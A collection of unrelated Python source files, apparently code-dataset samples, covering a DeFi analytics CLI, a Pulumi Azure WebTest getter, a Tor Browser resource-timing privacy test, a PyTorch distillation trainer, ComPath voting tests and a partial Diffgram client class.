add_output_arg(plot_time_to_liquidation_parser)
plot_supply_borrow_distribution_parser.add_argument(
"-m", "--max-blocks", default=17, type=int, help="maximum number of blocks to plot"
)
plot_top_suppliers_and_borrowers_parser = plot_subparsers.add_parser(
"top-suppliers-and-borrowers",
help="creates table with top suppliers and borrowers",
)
add_state_arg(plot_top_suppliers_and_borrowers_parser)
plot_top_suppliers_and_borrowers_parser.add_argument(
"-n",
"--top-n",
help="Number of suppliers and borrowers to plot",
type=int,
default=10,
)
export_parser = subparsers.add_parser("export")
add_protocol_choice(export_parser)
export_subparsers = export_parser.add_subparsers(dest="subcommand")
export_borsup_time_parser = export_subparsers.add_parser("borrow-supply-over-time")
export_borsup_time_parser.add_argument(
"-s", "--state", required=True, help="state pickle file"
)
add_output_arg(export_borsup_time_parser, required=True)
export_borsup_time_parser.add_argument("-t", "--threshold", default=10_000, type=int)
def run_create_indices(_args):
create_indices()
def run_process_all_events(args):
state = executor.process_all_events(
args["protocol"], hooks=args["hooks"], max_block=args["max_block"]
)
with open(args["output"], "wb") as f:
pickle.dump(state, f)
def run_plot(args):
protocol = Protocol.get(args["protocol"])()
plots = protocol.get_plots()
if not args["subcommand"]:
plot_parser.error("no subcommand provided")
func_name = "plot_{0}".format(args["subcommand"].replace("-", "_"))
func = getattr(plots, func_name, None)
if not func:
plot_parser.error(
"unknown plot {0} for protocol {1}".format(args["type"], args["protocol"])
)
func(args)
def run_export(args):
protocol: Protocol = Protocol.get(args["protocol"])()
exporter = protocol.get_exporter()
if not args["subcommand"]:
export_parser.error("no subcommand provided")
func_name = "export_{0}".format(args["subcommand"].replace("-", "_"))
func = getattr(exporter, func_name)
func(args)
def run():
args = parser.parse_args()
if not args.command:
parser.error("no command given")
func = globals()["run_" + args.command.replace("-", "_")]
func(vars(args))
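# Illustrative usage sketch (assumed invocation; the installed entry-point
# name is not shown in this file):
#
#   $ backd plot liquidable-over-time states.csv -o liquidable.png
#
# argparse then yields command="plot" and subcommand="liquidable-over-time",
# and run() dispatches to run_plot via globals()["run_plot"].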
|
[
"pickle.dump",
"argparse.ArgumentParser"
] |
[((404, 499), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""backd"""', 'description': '"""Command-line interface for backd.fund"""'}), "(prog='backd', description=\n 'Command-line interface for backd.fund')\n", (427, 499), False, 'import argparse\n'), ((5966, 5987), 'pickle.dump', 'pickle.dump', (['state', 'f'], {}), '(state, f)\n', (5977, 5987), False, 'import pickle\n')]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetWebTestResult',
'AwaitableGetWebTestResult',
'get_web_test',
]
@pulumi.output_type
class GetWebTestResult:
"""
An Application Insights WebTest definition.
"""
def __init__(__self__, configuration=None, description=None, enabled=None, frequency=None, id=None, kind=None, location=None, locations=None, name=None, provisioning_state=None, request=None, retry_enabled=None, synthetic_monitor_id=None, tags=None, timeout=None, type=None, validation_rules=None, web_test_kind=None, web_test_name=None):
if configuration and not isinstance(configuration, dict):
raise TypeError("Expected argument 'configuration' to be a dict")
pulumi.set(__self__, "configuration", configuration)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if enabled and not isinstance(enabled, bool):
raise TypeError("Expected argument 'enabled' to be a bool")
pulumi.set(__self__, "enabled", enabled)
if frequency and not isinstance(frequency, int):
raise TypeError("Expected argument 'frequency' to be a int")
pulumi.set(__self__, "frequency", frequency)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if locations and not isinstance(locations, list):
raise TypeError("Expected argument 'locations' to be a list")
pulumi.set(__self__, "locations", locations)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if request and not isinstance(request, dict):
raise TypeError("Expected argument 'request' to be a dict")
pulumi.set(__self__, "request", request)
if retry_enabled and not isinstance(retry_enabled, bool):
raise TypeError("Expected argument 'retry_enabled' to be a bool")
pulumi.set(__self__, "retry_enabled", retry_enabled)
if synthetic_monitor_id and not isinstance(synthetic_monitor_id, str):
raise TypeError("Expected argument 'synthetic_monitor_id' to be a str")
pulumi.set(__self__, "synthetic_monitor_id", synthetic_monitor_id)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if timeout and not isinstance(timeout, int):
raise TypeError("Expected argument 'timeout' to be a int")
pulumi.set(__self__, "timeout", timeout)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if validation_rules and not isinstance(validation_rules, dict):
raise TypeError("Expected argument 'validation_rules' to be a dict")
pulumi.set(__self__, "validation_rules", validation_rules)
if web_test_kind and not isinstance(web_test_kind, str):
raise TypeError("Expected argument 'web_test_kind' to be a str")
pulumi.set(__self__, "web_test_kind", web_test_kind)
if web_test_name and not isinstance(web_test_name, str):
raise TypeError("Expected argument 'web_test_name' to be a str")
pulumi.set(__self__, "web_test_name", web_test_name)
@property
@pulumi.getter
def configuration(self) -> Optional['outputs.WebTestPropertiesResponseConfiguration']:
"""
An XML configuration specification for a WebTest.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
User defined description for this WebTest.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
Is the test actively being monitored.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def frequency(self) -> Optional[int]:
"""
Interval in seconds between test runs for this WebTest. Default value is 300.
"""
return pulumi.get(self, "frequency")
@property
@pulumi.getter
def id(self) -> str:
"""
Azure resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
The kind of WebTest that this web test watches. Choices are ping and multistep.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def locations(self) -> Sequence['outputs.WebTestGeolocationResponse']:
"""
A list of where to physically run the tests from to give global coverage for accessibility of your application.
"""
return pulumi.get(self, "locations")
@property
@pulumi.getter
def name(self) -> str:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
        Current state of this component, whether or not it has been provisioned within the resource group it is defined. Users cannot change this value but are able to read from it. Values will include Succeeded, Deploying, Canceled, and Failed.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def request(self) -> Optional['outputs.WebTestPropertiesResponseRequest']:
"""
The collection of request properties
"""
return pulumi.get(self, "request")
@property
@pulumi.getter(name="retryEnabled")
def retry_enabled(self) -> Optional[bool]:
"""
Allow for retries should this WebTest fail.
"""
return pulumi.get(self, "retry_enabled")
@property
@pulumi.getter(name="syntheticMonitorId")
def synthetic_monitor_id(self) -> str:
"""
Unique ID of this WebTest. This is typically the same value as the Name field.
"""
return pulumi.get(self, "synthetic_monitor_id")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def timeout(self) -> Optional[int]:
"""
Seconds until this WebTest will timeout and fail. Default value is 30.
"""
return pulumi.get(self, "timeout")
@property
@pulumi.getter
def type(self) -> str:
"""
Azure resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="validationRules")
def validation_rules(self) -> Optional['outputs.WebTestPropertiesResponseValidationRules']:
"""
The collection of validation rule properties
"""
return pulumi.get(self, "validation_rules")
@property
@pulumi.getter(name="webTestKind")
def web_test_kind(self) -> str:
"""
The kind of web test this is, valid choices are ping, multistep, basic, and standard.
"""
return pulumi.get(self, "web_test_kind")
@property
@pulumi.getter(name="webTestName")
def web_test_name(self) -> str:
"""
        User defined name of this WebTest.
"""
return pulumi.get(self, "web_test_name")
class AwaitableGetWebTestResult(GetWebTestResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebTestResult(
configuration=self.configuration,
description=self.description,
enabled=self.enabled,
frequency=self.frequency,
id=self.id,
kind=self.kind,
location=self.location,
locations=self.locations,
name=self.name,
provisioning_state=self.provisioning_state,
request=self.request,
retry_enabled=self.retry_enabled,
synthetic_monitor_id=self.synthetic_monitor_id,
tags=self.tags,
timeout=self.timeout,
type=self.type,
validation_rules=self.validation_rules,
web_test_kind=self.web_test_kind,
web_test_name=self.web_test_name)
def get_web_test(resource_group_name: Optional[str] = None,
web_test_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebTestResult:
"""
An Application Insights WebTest definition.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str web_test_name: The name of the Application Insights WebTest resource.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['webTestName'] = web_test_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:insights/v20201005preview:getWebTest', __args__, opts=opts, typ=GetWebTestResult).value
return AwaitableGetWebTestResult(
configuration=__ret__.configuration,
description=__ret__.description,
enabled=__ret__.enabled,
frequency=__ret__.frequency,
id=__ret__.id,
kind=__ret__.kind,
location=__ret__.location,
locations=__ret__.locations,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
request=__ret__.request,
retry_enabled=__ret__.retry_enabled,
synthetic_monitor_id=__ret__.synthetic_monitor_id,
tags=__ret__.tags,
timeout=__ret__.timeout,
type=__ret__.type,
validation_rules=__ret__.validation_rules,
web_test_kind=__ret__.web_test_kind,
web_test_name=__ret__.web_test_name)
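# Illustrative usage sketch (not part of the generated file); the resource
# group and WebTest names below are assumed placeholder values:
#
#   result = get_web_test(resource_group_name="my-rg", web_test_name="my-test")
#   pulumi.export("syntheticMonitorId", result.synthetic_monitor_id)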
|
[
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] |
[((6304, 6343), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""provisioningState"""'}), "(name='provisioningState')\n", (6317, 6343), False, 'import pulumi\n'), ((6954, 6988), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""retryEnabled"""'}), "(name='retryEnabled')\n", (6967, 6988), False, 'import pulumi\n'), ((7181, 7221), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""syntheticMonitorId"""'}), "(name='syntheticMonitorId')\n", (7194, 7221), False, 'import pulumi\n'), ((7996, 8033), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""validationRules"""'}), "(name='validationRules')\n", (8009, 8033), False, 'import pulumi\n'), ((8279, 8312), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""webTestKind"""'}), "(name='webTestKind')\n", (8292, 8312), False, 'import pulumi\n'), ((8536, 8569), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""webTestName"""'}), "(name='webTestName')\n", (8549, 8569), False, 'import pulumi\n'), ((1035, 1087), 'pulumi.set', 'pulumi.set', (['__self__', '"""configuration"""', 'configuration'], {}), "(__self__, 'configuration', configuration)\n", (1045, 1087), False, 'import pulumi\n'), ((1232, 1280), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (1242, 1280), False, 'import pulumi\n'), ((1415, 1455), 'pulumi.set', 'pulumi.set', (['__self__', '"""enabled"""', 'enabled'], {}), "(__self__, 'enabled', enabled)\n", (1425, 1455), False, 'import pulumi\n'), ((1594, 1638), 'pulumi.set', 'pulumi.set', (['__self__', '"""frequency"""', 'frequency'], {}), "(__self__, 'frequency', frequency)\n", (1604, 1638), False, 'import pulumi\n'), ((1756, 1786), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (1766, 1786), False, 'import pulumi\n'), ((1910, 1944), 'pulumi.set', 'pulumi.set', (['__self__', '"""kind"""', 'kind'], {}), "(__self__, 'kind', kind)\n", (1920, 1944), False, 'import pulumi\n'), ((2080, 2122), 'pulumi.set', 'pulumi.set', (['__self__', '"""location"""', 'location'], {}), "(__self__, 'location', location)\n", (2090, 2122), False, 'import pulumi\n'), ((2263, 2307), 'pulumi.set', 'pulumi.set', (['__self__', '"""locations"""', 'locations'], {}), "(__self__, 'locations', locations)\n", (2273, 2307), False, 'import pulumi\n'), ((2431, 2465), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (2441, 2465), False, 'import pulumi\n'), ((2631, 2693), 'pulumi.set', 'pulumi.set', (['__self__', '"""provisioning_state"""', 'provisioning_state'], {}), "(__self__, 'provisioning_state', provisioning_state)\n", (2641, 2693), False, 'import pulumi\n'), ((2828, 2868), 'pulumi.set', 'pulumi.set', (['__self__', '"""request"""', 'request'], {}), "(__self__, 'request', request)\n", (2838, 2868), False, 'import pulumi\n'), ((3021, 3073), 'pulumi.set', 'pulumi.set', (['__self__', '"""retry_enabled"""', 'retry_enabled'], {}), "(__self__, 'retry_enabled', retry_enabled)\n", (3031, 3073), False, 'import pulumi\n'), ((3245, 3311), 'pulumi.set', 'pulumi.set', (['__self__', '"""synthetic_monitor_id"""', 'synthetic_monitor_id'], {}), "(__self__, 'synthetic_monitor_id', synthetic_monitor_id)\n", (3255, 3311), False, 'import pulumi\n'), ((3437, 3471), 'pulumi.set', 'pulumi.set', (['__self__', '"""tags"""', 'tags'], {}), "(__self__, 'tags', tags)\n", (3447, 3471), False, 'import pulumi\n'), ((3604, 3644), 'pulumi.set', 'pulumi.set', (['__self__', '"""timeout"""', 'timeout'], {}), "(__self__, 'timeout', timeout)\n", (3614, 3644), False, 'import pulumi\n'), ((3768, 3802), 'pulumi.set', 'pulumi.set', (['__self__', '"""type"""', 'type'], {}), "(__self__, 'type', type)\n", (3778, 3802), False, 'import pulumi\n'), ((3964, 4022), 'pulumi.set', 'pulumi.set', (['__self__', '"""validation_rules"""', 'validation_rules'], {}), "(__self__, 'validation_rules', validation_rules)\n", (3974, 4022), False, 'import pulumi\n'), ((4173, 4225), 'pulumi.set', 'pulumi.set', (['__self__', '"""web_test_kind"""', 'web_test_kind'], {}), "(__self__, 'web_test_kind', web_test_kind)\n", (4183, 4225), False, 'import pulumi\n'), ((4376, 4428), 'pulumi.set', 'pulumi.set', (['__self__', '"""web_test_name"""', 'web_test_name'], {}), "(__self__, 'web_test_name', web_test_name)\n", (4386, 4428), False, 'import pulumi\n'), ((4651, 4684), 'pulumi.get', 'pulumi.get', (['self', '"""configuration"""'], {}), "(self, 'configuration')\n", (4661, 4684), False, 'import pulumi\n'), ((4853, 4884), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (4863, 4884), False, 'import pulumi\n'), ((5045, 5072), 'pulumi.get', 'pulumi.get', (['self', '"""enabled"""'], {}), "(self, 'enabled')\n", (5055, 5072), False, 'import pulumi\n'), ((5274, 5303), 'pulumi.get', 'pulumi.get', (['self', '"""frequency"""'], {}), "(self, 'frequency')\n", (5284, 5303), False, 'import pulumi\n'), ((5428, 5450), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (5438, 5450), False, 'import pulumi\n'), ((5649, 5673), 'pulumi.get', 'pulumi.get', (['self', '"""kind"""'], {}), "(self, 'kind')\n", (5659, 5673), False, 'import pulumi\n'), ((5804, 5832), 'pulumi.get', 'pulumi.get', (['self', '"""location"""'], {}), "(self, 'location')\n", (5814, 5832), False, 'import pulumi\n'), ((6101, 6130), 'pulumi.get', 'pulumi.get', (['self', '"""locations"""'], {}), "(self, 'locations')\n", (6111, 6130), False, 'import pulumi\n'), ((6259, 6283), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (6269, 6283), False, 'import pulumi\n'), ((6670, 6708), 'pulumi.get', 'pulumi.get', (['self', '"""provisioning_state"""'], {}), "(self, 'provisioning_state')\n", (6680, 6708), False, 'import pulumi\n'), ((6906, 6933), 'pulumi.get', 'pulumi.get', (['self', '"""request"""'], {}), "(self, 'request')\n", (6916, 6933), False, 'import pulumi\n'), ((7127, 7160), 'pulumi.get', 'pulumi.get', (['self', '"""retry_enabled"""'], {}), "(self, 'retry_enabled')\n", (7137, 7160), False, 'import pulumi\n'), ((7391, 7431), 'pulumi.get', 'pulumi.get', (['self', '"""synthetic_monitor_id"""'], {}), "(self, 'synthetic_monitor_id')\n", (7401, 7431), False, 'import pulumi\n'), ((7578, 7602), 'pulumi.get', 'pulumi.get', (['self', '"""tags"""'], {}), "(self, 'tags')\n", (7588, 7602), False, 'import pulumi\n'), ((7795, 7822), 'pulumi.get', 'pulumi.get', (['self', '"""timeout"""'], {}), "(self, 'timeout')\n", (7805, 7822), False, 'import pulumi\n'), ((7951, 7975), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (7961, 7975), False, 'import pulumi\n'), ((8222, 8258), 'pulumi.get', 'pulumi.get', (['self', '"""validation_rules"""'], {}), "(self, 'validation_rules')\n", (8232, 8258), False, 'import pulumi\n'), ((8482, 8515), 'pulumi.get', 'pulumi.get', (['self', '"""web_test_kind"""'], {}), "(self, 'web_test_kind')\n", (8492, 8515), False, 'import pulumi\n'), ((8688, 8721), 'pulumi.get', 'pulumi.get', (['self', '"""web_test_name"""'], {}), "(self, 'web_test_name')\n", (8698, 8721), False, 'import pulumi\n'), ((10275, 10297), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (10295, 10297), False, 'import pulumi\n'), ((10389, 10510), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""azure-native:insights/v20201005preview:getWebTest"""', '__args__'], {'opts': 'opts', 'typ': 'GetWebTestResult'}), "('azure-native:insights/v20201005preview:getWebTest',\n __args__, opts=opts, typ=GetWebTestResult)\n", (10410, 10510), False, 'import pulumi\n')]
|
# This test checks whether the Resource Timing API (see:
# http://www.w3.org/TR/resource-timing/) is really disabled in the default
# Tor Browser. Setting |dom.enable_resource_timing| to |false| and testing that
# might not be sufficient.
from marionette_harness import MarionetteTestCase
class Test(MarionetteTestCase):
def setUp(self):
MarionetteTestCase.setUp(self)
self.TEST_URL = "https://www.mediawiki.org/wiki/MediaWiki"
self.RESOURCE_URL = "https://upload.wikimedia.org/wikipedia/mediawiki/b/bc/Wiki.png"
def test_resource_timing(self):
with self.marionette.using_context('content'):
self.marionette.navigate(self.TEST_URL)
# If resource timing is disabled we should not be able to get resource
# entries at all in the first place. We test all three methods for safety's
# sake.
# getEntriesByType()
err_msg = 'resource entries found (getEntriesByType())'
self.assertTrue(self.marionette.execute_script("""
try {
var resources = document.defaultView.performance.
getEntriesByType("resource")[0];
} catch (e) {
return false;
}
return resources == undefined;
"""),
msg=err_msg)
# getEntriesByName()
err_msg = "resource entries found (getEntriesByName())"
self.assertTrue(self.marionette.execute_script("""
try {
var resources = document.defaultView.performance.
getEntriesByName(arguments[0])[0];
} catch (e) {
return false;
}
return resources == undefined;
""", script_args=[self.RESOURCE_URL]),
msg=err_msg)
# getEntries()
err_msg = "resource entries found (getEntries())"
self.assertTrue(self.marionette.execute_script("""
try {
var resources = document.defaultView.performance.
getEntries()[0];
} catch (e) {
return false;
}
return resources == undefined;
"""),
msg=err_msg)
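# For reference, when resource timing is enabled, getEntriesByType("resource")
# returns PerformanceResourceTiming objects roughly of the form (illustrative
# values only):
#   { name: "https://upload.wikimedia.org/.../Wiki.png",
#     entryType: "resource", startTime: 12.3, duration: 45.6, ... }
# so each script above would find resources[0] defined and the assertions
# would fail.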
|
[
"marionette_harness.MarionetteTestCase.setUp"
] |
[((353, 383), 'marionette_harness.MarionetteTestCase.setUp', 'MarionetteTestCase.setUp', (['self'], {}), '(self)\n', (377, 383), False, 'from marionette_harness import MarionetteTestCase\n')]
|
from typing import Any, Callable, Tuple
from cfg import Opts
from mlutils import gen, mod
from torch.functional import Tensor
from torch.optim import SGD
from timm.optim import create_optimizer_v2
from torch.optim.lr_scheduler import StepLR
from torch import nn
import torch
from .distill import BaseDistillTrainer
from .losses import DistillationLoss
__all__ = ['OfflineDistillTrainer']
class OfflineDistillTrainer(BaseDistillTrainer):
@gen.synchrony
def __init__(
self,
opt: Opts,
student_model: nn.Module,
) -> None:
assert opt.get('teacher_id', None) is not None
opt.set('exp_id', opt.teacher_id)
super().__init__(opt)
teacher_model = self.model_manager.load_model()
self.teacher_model = self.setup_teacher(teacher_model)
self.student_model = student_model
self.student_optimizer = create_optimizer_v2(
student_model,
opt.get('student_optimizer', 'sgd'),
learning_rate=opt.student_lr,
weight_decay=opt.get('student_weight_decay', 1.0e-4)
)
self.student_scheduler = StepLR(self.student_optimizer, 20, 0.95)
self.teacher_model = yield self.to_gpu(self.teacher_model)
self.student_model = yield self.to_gpu(self.student_model)
self.actual_loss_fn = nn.CrossEntropyLoss()
self.distill_loss_fn = DistillationLoss(
distillation_type=opt.get('distillation_type', 'hard'),
tau=opt.get('distillation_tau', 1.0)
)
def train_teacher_step(
self, *item: Tuple[Any]
) -> Tuple[Tensor, Tensor]:
images, labels = item
with torch.no_grad():
logits = self.teacher_model(images)
loss = self.actual_loss_fn(logits, labels)
return loss, logits
def train_student_step(
self, *item: Tuple[Any]
) -> Tuple[Tensor, Tensor]:
images, labels, teacher_logits = item
self.student_optimizer.zero_grad()
student_out = self.student_model(images)
if isinstance(student_out, tuple):
logits = student_out[0]
dist_logits = student_out[1]
else:
logits = student_out
dist_logits = student_out
actual_loss = self.actual_loss_fn(logits, labels)
distill_loss = self.distill_loss_fn(dist_logits, teacher_logits)
loss = actual_loss + distill_loss
loss.backward()
self.student_optimizer.step()
return loss, logits
@gen.detach_cpu
@gen.synchrony
def train_step(self, item):
images, labels = item
images = yield self.to_gpu(images)
labels = yield self.to_gpu(labels)
labels = labels.type(torch.int64)
teacher_loss, teacher_logits = self.train_teacher_step(
images, labels
)
student_loss, student_logits = self.train_student_step(
images, labels, teacher_logits
)
total_loss = teacher_loss + student_loss
self.teacher_loss_meter.append(teacher_loss.detach())
self.student_loss_meter.append(student_loss.detach())
self.show_images('train_image', images)
preds = self.logit_to_pred(student_logits)
return total_loss, preds, labels
@gen.detach_cpu
@gen.synchrony
def eval_step(self, item):
images, labels = item
images = yield self.to_gpu(images)
labels = yield self.to_gpu(labels)
labels = labels.type(torch.int64)
logits = self.student_model(images)
loss = self.actual_loss_fn(logits, labels)
self.show_images('eval_image', images)
preds = self.logit_to_pred(logits)
return loss, preds, labels
@gen.synchrony
def inference(self, inp: Tensor) -> Tensor:
inp = yield self.to_gpu(inp)
if inp.ndim == 3:
inp = inp.unsqueeze(0)
with torch.no_grad():
logits = self.net(inp)
self.show_images('inference_image', inp)
preds = self.logit_to_pred(logits)
preds = yield self.to_cpu(preds.detach())
return preds
def on_epoch_end(self) -> None:
self.student_scheduler.step()
super().on_epoch_end()
def setup_teacher(
self,
teacher_model: nn.Module
) -> nn.Module:
for p in teacher_model.parameters():
p.requires_grad = False
return teacher_model
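# For reference, a sketch of the objective combined in train_student_step,
# assuming the "hard" distillation default (DistillationLoss itself lives in
# .losses and is not shown here; F stands for torch.nn.functional):
#
#   teacher_targets = teacher_logits.argmax(dim=1)
#   loss = F.cross_entropy(logits, labels) + F.cross_entropy(dist_logits, teacher_targets)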
|
[
"torch.nn.CrossEntropyLoss",
"torch.no_grad",
"torch.optim.lr_scheduler.StepLR"
] |
[((1130, 1170), 'torch.optim.lr_scheduler.StepLR', 'StepLR', (['self.student_optimizer', '(20)', '(0.95)'], {}), '(self.student_optimizer, 20, 0.95)\n', (1136, 1170), False, 'from torch.optim.lr_scheduler import StepLR\n'), ((1335, 1356), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1354, 1356), False, 'from torch import nn\n'), ((1669, 1684), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1682, 1684), False, 'import torch\n'), ((3914, 3929), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3927, 3929), False, 'import torch\n')]
|
# -*- coding: utf-8 -*-
"""This module contains tests for the data model of ComPath."""
from compath.constants import EQUIVALENT_TO
from compath.models import User
from tests.constants import DatabaseMixin, KEGG, REACTOME
class TestVotingSystem(DatabaseMixin):
"""Test Voting System."""
def test_missing_manager_1(self):
"""Test that the mapping can't be created if the first manager can't be looked up."""
with self.assertRaises(ValueError):
self.manager.get_or_create_mapping('missing manager 1', '', '', REACTOME, '', '', '', '')
def test_missing_manager_2(self):
"""Test that the mapping can't be created if the second manager can't be looked up."""
with self.assertRaises(ValueError):
            self.manager.get_or_create_mapping(REACTOME, '', '', 'missing manager 2', '', '', '', '')
def test_vote_up(self):
"""Test if votes are adding."""
current_user = User(email='my_email', id=1)
mapping_1, _ = self.manager.get_or_create_mapping(
KEGG,
'1',
'kegg pathway',
REACTOME,
'2',
'reactome pathway',
EQUIVALENT_TO,
current_user
)
vote = self.manager.get_or_create_vote(user=current_user, mapping=mapping_1)
self.assertEqual(1, self.manager.count_votes(), msg='Vote was not created')
self.assertEqual(True, vote.type, msg='Vote type is wrong')
def test_vote_down(self):
"""Test if votes are adding."""
current_user = User(email='my_email', id=1)
mapping_1, created = self.manager.get_or_create_mapping(
KEGG,
'1',
'kegg pathway',
REACTOME,
'2',
'reactome pathway',
EQUIVALENT_TO,
current_user
)
self.assertTrue(created, msg='Mapping not created')
vote = self.manager.get_or_create_vote(user=current_user, mapping=mapping_1, vote_type=False)
self.assertEqual(1, self.manager.count_votes(), msg='Vote was not created')
self.assertFalse(vote.type, msg='Vote type is wrong')
def test_double_voting(self):
"""Test voting."""
current_user_1 = User(email='my_email1', id=1)
current_user_2 = User(email='my_email2', id=2)
mapping_1, created = self.manager.get_or_create_mapping(
KEGG,
'1',
'kegg pathway',
REACTOME,
'2',
'reactome pathway',
EQUIVALENT_TO,
current_user_1
)
self.assertTrue(created, 'mapping not created')
mapping_2, created = self.manager.get_or_create_mapping(
REACTOME,
'2',
'reactome pathway',
KEGG,
'1',
'kegg pathway',
EQUIVALENT_TO,
current_user_2
)
self.assertFalse(created, 'mapping was created')
self.assertEqual(2, self.manager.count_votes(), msg='Problem with votes')
vote_1 = self.manager.get_or_create_vote(user=current_user_1, mapping=mapping_1, vote_type=False)
vote_2 = self.manager.get_or_create_vote(user=current_user_2, mapping=mapping_2)
self.assertEqual(2, self.manager.count_votes(), msg='Problem with votes')
self.assertFalse(vote_1.type, msg='First vote type is wrong')
self.assertTrue(vote_2.type, msg='Second vote type is wrong')
|
[
"compath.models.User"
] |
[((949, 977), 'compath.models.User', 'User', ([], {'email': '"""my_email"""', 'id': '(1)'}), "(email='my_email', id=1)\n", (953, 977), False, 'from compath.models import User\n'), ((1567, 1595), 'compath.models.User', 'User', ([], {'email': '"""my_email"""', 'id': '(1)'}), "(email='my_email', id=1)\n", (1571, 1595), False, 'from compath.models import User\n'), ((2255, 2284), 'compath.models.User', 'User', ([], {'email': '"""my_email1"""', 'id': '(1)'}), "(email='my_email1', id=1)\n", (2259, 2284), False, 'from compath.models import User\n'), ((2310, 2339), 'compath.models.User', 'User', ([], {'email': '"""my_email2"""', 'id': '(2)'}), "(email='my_email2', id=2)\n", (2314, 2339), False, 'from compath.models import User\n')]
|
from diffgram.brain.inference import Inference
import tempfile
import shutil
import errno
# TODO import these only if local prediction is needed
import cv2
try:
import tensorflow as tf
except Exception:
print("Could not import tensorflow")
import numpy as np
import requests
import scipy.misc
import diffgram.utils.visualization_utils as vis_util
class Brain():
def __init__(
self,
client,
name=None,
id=None,
local=False,
use_temp_storage=True
):
"""
client, project client object
name, string, exact match for Project AI name
local, bool, run model locally
if local is true will perform additional setup work local_setup()
"""
self.client = client
if self.client.project_string_id is None:
raise Exception("\n No project string id in client.")
self.name = name
self.id = id
self.status = None
self.local = local
self.method = None
self.sub_method = None
self.min_score_thresh = .5
self.build_complete = None
self.model_path = None
self.image_to_run = None
self.use_temp_storage = use_temp_storage
self.local_model_storage_path = None
if self.local is True:
# These are only needed for local operations
self.temp = tempfile.mkdtemp()
self.local_setup()
def inference_from_response(
self,
dict):
# Assumes object detection
# TODO condition on method
inference = Inference(
method = "object_detection",
id = dict['id'],
status = dict['status'],
box_list = dict['box_list'],
score_list = dict['score_list'],
label_list = dict['label_list']
)
return inference
def predict_from_url(
self,
url):
"""
url, string, web end point to get file
"""
if self.local is True:
raise Exception("Not supported for local models yet.")
request = {}
request['url'] = url
request['ai_name'] = self.name
endpoint = "/api/walrus/v1/project/" + self.client.project_string_id + \
"/inference/from_url"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
self.client.handle_errors(response)
inference = self.inference_from_response(data['inference'])
return inference
def predict_from_local(
self,
path):
"""
Make a prediction from a local file.
Creates a Diffgram file object and runs prediction.
This is roughly equal to running file.from_local() and predict()
but in one request (instead of two).
path, string, file path
"""
if self.local is True:
self.image_to_run = open(path, "rb")
# WIP
# TODO clean up, declare options for different types of expected inputs
# this is for model that expects numpy array as input
#self.image_np = scipy.misc.imread(path)
